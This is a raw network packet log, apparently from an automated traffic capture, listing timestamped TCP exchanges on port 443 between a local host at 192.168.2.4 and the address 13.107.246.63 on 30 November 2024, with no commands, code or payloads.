                                                                                        Nov 30, 2024 12:48:00.206826925 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.245605946 CET49756443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.245635033 CET49755443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.245652914 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.245654106 CET4434975613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.245755911 CET49756443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.245970964 CET49756443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.245973110 CET49755443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.245985031 CET4434975613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.246068001 CET49755443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.246079922 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.247450113 CET49757443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.247536898 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.247598886 CET49757443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.247801065 CET49757443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.247838020 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.248657942 CET49758443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.248667955 CET4434975813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.248718023 CET49758443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.249303102 CET49759443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.249325991 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.249391079 CET49759443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.249434948 CET49758443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.249445915 CET4434975813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.249536991 CET49759443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.249561071 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:01.962522984 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:01.966368914 CET49755443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:01.966396093 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:01.966866016 CET49755443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:01.966871977 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.003607988 CET4434975613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.005203009 CET49756443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.005229950 CET4434975613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.008537054 CET49756443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.008543015 CET4434975613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.030883074 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.031627893 CET49757443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.031647921 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.032011032 CET49757443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.032016993 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.033451080 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.039176941 CET49759443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.039205074 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.043205976 CET49759443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.043216944 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.093569040 CET4434975813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.095065117 CET49758443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.095088005 CET4434975813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.095999002 CET49758443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.096007109 CET4434975813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.403541088 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.403567076 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.403635025 CET49755443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.403650999 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.403693914 CET49755443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.403872013 CET49755443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.403877020 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.403889894 CET49755443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.404030085 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.404058933 CET4434975513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.404097080 CET49755443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.406434059 CET49760443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.406466961 CET4434976013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.406543016 CET49760443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.406655073 CET49760443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.406665087 CET4434976013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.439209938 CET4434975613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.439260960 CET4434975613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.439331055 CET49756443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.439502954 CET49756443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.439518929 CET4434975613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.439527988 CET49756443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.439537048 CET4434975613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.442015886 CET49761443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.442043066 CET4434976113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.442122936 CET49761443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.442243099 CET49761443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.442256927 CET4434976113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.480066061 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.480087996 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.480165005 CET49757443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.480205059 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.480269909 CET49757443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.480304956 CET49757443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.480304956 CET49757443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.480321884 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.480485916 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.480513096 CET4434975713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.480556011 CET49757443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.481966019 CET49762443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.481987000 CET4434976213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.482048988 CET49762443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.482146025 CET49762443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.482156992 CET4434976213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.482428074 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.482450008 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.482491970 CET49759443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.482508898 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.482609034 CET49759443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.482609987 CET49759443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.482637882 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.482765913 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.482794046 CET4434975913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.482837915 CET49759443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.484272003 CET49763443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.484282017 CET4434976313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.484334946 CET49763443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.484438896 CET49763443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.484450102 CET4434976313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.550180912 CET4434975813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.550224066 CET4434975813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.550266981 CET49758443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.550390959 CET49758443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.550398111 CET4434975813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.550407887 CET49758443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.550411940 CET4434975813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.552212000 CET49764443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.552237034 CET4434976413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:02.552299023 CET49764443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.552422047 CET49764443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:02.552434921 CET4434976413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.187056065 CET4434976013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.187948942 CET49760443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.187980890 CET4434976013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.188448906 CET49760443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.188453913 CET4434976013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.285376072 CET4434976113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.285784006 CET49761443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.285803080 CET4434976113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.286166906 CET49761443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.286170959 CET4434976113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.297941923 CET4434976313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.298214912 CET4434976213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.298532963 CET49763443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.298547029 CET4434976313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.298923969 CET49763443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.298927069 CET4434976313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.298962116 CET49762443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.298985958 CET4434976213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.299338102 CET49762443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.299343109 CET4434976213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.396836042 CET4434976413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.397279978 CET49764443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.397293091 CET4434976413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.397659063 CET49764443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.397665024 CET4434976413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.631192923 CET4434976013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.631263018 CET4434976013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.631442070 CET49760443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.631867886 CET49760443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.631882906 CET4434976013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.631897926 CET49760443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.631902933 CET4434976013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.634814978 CET49765443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.634845972 CET4434976513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.634936094 CET49765443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.635087013 CET49765443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.635102034 CET4434976513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.739070892 CET4434976113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.739119053 CET4434976113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.739171982 CET49761443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.739298105 CET49761443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.739310980 CET4434976113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.739325047 CET49761443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.739329100 CET4434976113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.741324902 CET49766443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.741353035 CET4434976613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.741427898 CET49766443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.741549015 CET49766443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.741563082 CET4434976613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.742304087 CET4434976313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.742350101 CET4434976313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.742388964 CET49763443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.742481947 CET49763443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.742481947 CET49763443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.742489100 CET4434976313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.742496014 CET4434976313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.742710114 CET4434976213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.742763042 CET4434976213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.742810011 CET49762443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.742867947 CET49762443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.742872953 CET4434976213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.742882013 CET49762443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.742886066 CET4434976213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.744609118 CET49767443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.744620085 CET4434976713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.744682074 CET49767443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.744776011 CET49767443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.744787931 CET4434976713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.744854927 CET49768443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.744888067 CET4434976813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.744951010 CET49768443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.745058060 CET49768443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.745070934 CET4434976813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.850620985 CET4434976413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.850667000 CET4434976413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.850744009 CET49764443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.850866079 CET49764443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.850876093 CET4434976413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.850886106 CET49764443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.850892067 CET4434976413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.852765083 CET49769443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.852794886 CET4434976913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:04.852854013 CET49769443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.852967024 CET49769443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:04.852979898 CET4434976913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.447707891 CET4434976713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.448302984 CET49767443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.448332071 CET4434976713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.448683023 CET49767443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.448688030 CET4434976713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.449479103 CET4434976513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.449744940 CET49765443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.449758053 CET4434976513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.450090885 CET49765443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.450094938 CET4434976513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.526839018 CET4434976813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.527287960 CET49768443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.527308941 CET4434976813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.527575970 CET49768443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.527580023 CET4434976813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.653235912 CET4434976913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.653772116 CET49769443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.653789997 CET4434976913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.654124022 CET49769443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.654129028 CET4434976913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.658437014 CET4434976613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.658731937 CET49766443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.658756018 CET4434976613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.659085989 CET49766443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.659091949 CET4434976613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.893423080 CET4434976513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.893501997 CET4434976513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.893567085 CET49765443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.893789053 CET49765443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.893804073 CET4434976513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.893815994 CET49765443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.893821001 CET4434976513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.901279926 CET4434976713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.901352882 CET4434976713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.901417017 CET49767443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.902046919 CET49767443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.902050972 CET4434976713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.902069092 CET49767443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.902080059 CET4434976713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.903475046 CET49771443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.903491974 CET4434977113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.903569937 CET49771443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.903704882 CET49771443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.903717995 CET4434977113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.904267073 CET49772443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.904311895 CET4434977213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.904383898 CET49772443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.904453993 CET49772443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.904468060 CET4434977213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.971532106 CET4434976813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.971577883 CET4434976813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.971621037 CET49768443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.971741915 CET49768443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.971755028 CET4434976813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.971765041 CET49768443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.971770048 CET4434976813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.973799944 CET49773443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.973872900 CET4434977313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:06.973956108 CET49773443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.974071026 CET49773443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:06.974103928 CET4434977313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.096997976 CET4434976913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.097042084 CET4434976913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.097095966 CET49769443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.097217083 CET49769443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.097223997 CET4434976913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.097237110 CET49769443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.097242117 CET4434976913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.099087000 CET49774443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.099103928 CET4434977413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.099174976 CET49774443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.099297047 CET49774443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.099306107 CET4434977413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.113923073 CET4434976613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.113965988 CET4434976613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.114018917 CET49766443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.114124060 CET49766443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.114139080 CET4434976613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.114149094 CET49766443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.114154100 CET4434976613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.115964890 CET49775443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.116003990 CET4434977513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:07.116101027 CET49775443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.116334915 CET49775443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:07.116362095 CET4434977513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.620109081 CET4434977213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.620637894 CET49772443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:08.620661020 CET4434977213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.621118069 CET49772443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:08.621124029 CET4434977213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.684124947 CET4434977113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.684613943 CET49771443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:08.684633017 CET4434977113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.685161114 CET49771443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:08.685165882 CET4434977113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.753314018 CET4434977313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.753699064 CET49773443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:08.753746033 CET4434977313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.754117012 CET49773443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:08.754132032 CET4434977313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.814888000 CET4434977413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.815227985 CET49774443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:08.815244913 CET4434977413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.815633059 CET49774443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:08.815637112 CET4434977413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.962703943 CET4434977513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.963172913 CET49775443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:08.963197947 CET4434977513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:08.963651896 CET49775443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:08.963664055 CET4434977513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.055224895 CET4434977213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.055288076 CET4434977213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.055370092 CET49772443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.055620909 CET49772443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.055646896 CET4434977213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.055660963 CET49772443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.055668116 CET4434977213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.058929920 CET49776443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.058958054 CET4434977613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.059061050 CET49776443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.059230089 CET49776443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.059242964 CET4434977613.107.246.63192.168.2.4
